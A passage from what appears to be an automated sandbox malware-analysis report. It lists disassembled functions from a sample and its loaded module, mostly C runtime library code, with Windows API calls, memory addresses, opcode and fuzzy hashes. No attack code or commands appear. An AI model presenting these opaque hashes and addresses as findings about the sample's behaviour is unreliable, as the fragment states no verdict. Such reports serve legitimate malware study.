                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: StringType$ByteCharMultiWide$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 319667368-0
                                                                                  • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                                                  • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                                                                  • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                                                  • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                                                                  Function 000000014000ADE0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                                                                    • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                                                                  • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                                                                  • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 1390108997-0
                                                                                  • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                                                  • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                                                                  • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                                                  • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                                                                  Function 00007FF8BFB84CD4 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                  • String ID: csm$csm$csm
                                                                                  • API String ID: 3523768491-393685449
                                                                                  • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                                                  • Instruction ID: 2550089acd0df70ce0b3f23231f51961ba69eeb1c44ec8f9815d4e09ecd1ab5f
                                                                                  • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                                                  • Instruction Fuzzy Hash: 45E19E33A087828AEB24AFADD4806AD7BA0FB857D8F145135DB8D57697DF38E491C700
                                                                                  Function 00007FF8BFB895BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF8BFB88BC9,?,?,?,?,00007FF8BFB88C14), ref: 00007FF8BFB895CB
                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF8BFB88BC9,?,?,?,?,00007FF8BFB88C14), ref: 00007FF8BFB89601
                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF8BFB88BC9,?,?,?,?,00007FF8BFB88C14), ref: 00007FF8BFB8962E
                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF8BFB88BC9,?,?,?,?,00007FF8BFB88C14), ref: 00007FF8BFB8963F
                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF8BFB88BC9,?,?,?,?,00007FF8BFB88C14), ref: 00007FF8BFB89650
                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF8BFB88BC9,?,?,?,?,00007FF8BFB88C14), ref: 00007FF8BFB8966B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 2506987500-0
                                                                                  • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                                                  • Instruction ID: 5c21a7273f4b9fa59c1448785cdd73876be84a4176b77fc18faa16e0e944f221
                                                                                  • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                                                  • Instruction Fuzzy Hash: A7113724F0D64286FE59A7BA999117963929FC8BF0F448735EB3E06BD7DE2CE441C200
                                                                                  Function 0000000140013850 Relevance: 9.0, APIs: 6, Instructions: 18synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 3326452711-0
                                                                                  • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                                                  • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                                                                  • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                                                  • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                                                                  Function 0000000140003790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                                                  • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                                                                  • API String ID: 2984211723-1229430080
                                                                                  • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                                                  • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                                                                  • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                                                  • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                                                                  Function 00007FF8BFB87F28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                  • API String ID: 4061214504-1276376045
                                                                                  • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                                                  • Instruction ID: f1dcfd941589b3bf5d306fa70c6e22721d855aeac14c3c8f3d72cbbeaaa10927
                                                                                  • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                                                  • Instruction Fuzzy Hash: CFF06D61F19A4282EB108BA9E84533A7324AF887E5FA84335DB6E466F4CF3CD449C340
                                                                                  Function 0000000140008510 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                                                                  • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                                                                  • ExitProcess.KERNEL32 ref: 0000000140008545
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressExitHandleModuleProcProcess
                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                  • API String ID: 75539706-1276376045
                                                                                  • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                                                  • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                                                                  • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                                                  • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                                                                  Function 00007FF8BFB840D4 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdjustPointer
                                                                                  • String ID:
                                                                                  • API String ID: 1740715915-0
                                                                                  • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                                                  • Instruction ID: d1cc280d2462283d9315ab0729b84cb3e0c33d4eab5bedf5b7e5d105d2f70844
                                                                                  • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                                                  • Instruction Fuzzy Hash: 50B16D22A1E686C1EA69EF99D48067D6B90EF94BC4F098835DF4D0779BDE3DE452C300
                                                                                  Function 0000000140009F50 Relevance: 7.7, APIs: 5, Instructions: 208COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileInfoSleepStartupType
                                                                                  • String ID:
                                                                                  • API String ID: 1527402494-0
                                                                                  • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                                                  • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                                                                  • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                                                  • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                                                                  Function 0000000140009E30 Relevance: 7.6, APIs: 5, Instructions: 74COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CommandLine$ByteCharErrorLastMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 3078728599-0
                                                                                  • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                                                  • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                                                                  • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                                                  • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                                                                  Function 000000014000FD50 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                                                                  • String ID:
                                                                                  • API String ID: 1850339568-0
                                                                                  • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                                                  • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                                                                  • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                                                  • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                                                                  Function 00007FF8BFB8FB54 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: _set_statfp
                                                                                  • String ID:
                                                                                  • API String ID: 1156100317-0
                                                                                  • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                                                  • Instruction ID: 7fcc88b360fae37725c14d1e4f08680239e618137995bb92fbf10eae4d0ba267
                                                                                  • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                                                  • Instruction Fuzzy Hash: 3611547AE18A5B01F79412ECE96637913516FDC3F4F148634E7BE066DB8F2CA841C101
                                                                                  Function 00007FF8BFB89684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FlsGetValue.KERNEL32(?,?,?,00007FF8BFB8766F,?,?,00000000,00007FF8BFB8790A,?,?,?,?,?,00007FF8BFB87896), ref: 00007FF8BFB896A3
                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF8BFB8766F,?,?,00000000,00007FF8BFB8790A,?,?,?,?,?,00007FF8BFB87896), ref: 00007FF8BFB896C2
                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF8BFB8766F,?,?,00000000,00007FF8BFB8790A,?,?,?,?,?,00007FF8BFB87896), ref: 00007FF8BFB896EA
                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF8BFB8766F,?,?,00000000,00007FF8BFB8790A,?,?,?,?,?,00007FF8BFB87896), ref: 00007FF8BFB896FB
                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF8BFB8766F,?,?,00000000,00007FF8BFB8790A,?,?,?,?,?,00007FF8BFB87896), ref: 00007FF8BFB8970C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID:
                                                                                  • API String ID: 3702945584-0
                                                                                  • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                                                  • Instruction ID: 9f5af93d0a612c60676c1ef4e2abd84947843f4418f958990e94f68a2b114fe3
                                                                                  • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                                                  • Instruction Fuzzy Hash: 06110A24A0D24346FE58A7FE695117963829FC4BF0F588335EA6E066DBEE2CE441C600
                                                                                  Function 00007FF8BFB89518 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID:
                                                                                  • API String ID: 3702945584-0
                                                                                  • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                                                  • Instruction ID: e85ecc1027f94d47ad8b896b40f9faf5406124437d41b2ff89876a33df68353f
                                                                                  • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                                                  • Instruction Fuzzy Hash: D411A554A0D2474AFE68A7FD94621B913814FC4BF0F584735DB3E4A2D7EE2CB545C601
                                                                                  Function 00007FF8BFB85448 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallEncodePointerTranslator
                                                                                  • String ID: MOC$RCC
                                                                                  • API String ID: 3544855599-2084237596
                                                                                  • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                                                  • Instruction ID: 5829a87ccaf0ed03178517a44eaec22d9265bc296ed969d0de894ac8576341b4
                                                                                  • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                                                  • Instruction Fuzzy Hash: D9919F73A187858AE710CBA8D8506AD7BA0FB847D8F14513AEB4D17B56EF38D1A5CB00
                                                                                  Function 00007FF8BFB83A38 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                  • String ID: csm
                                                                                  • API String ID: 2395640692-1018135373
                                                                                  • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                                                                  • Instruction ID: 867d2a1600777b9ed575c0e954036aca8b73ffc22d6c39535c619493bcb8b8e1
                                                                                  • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
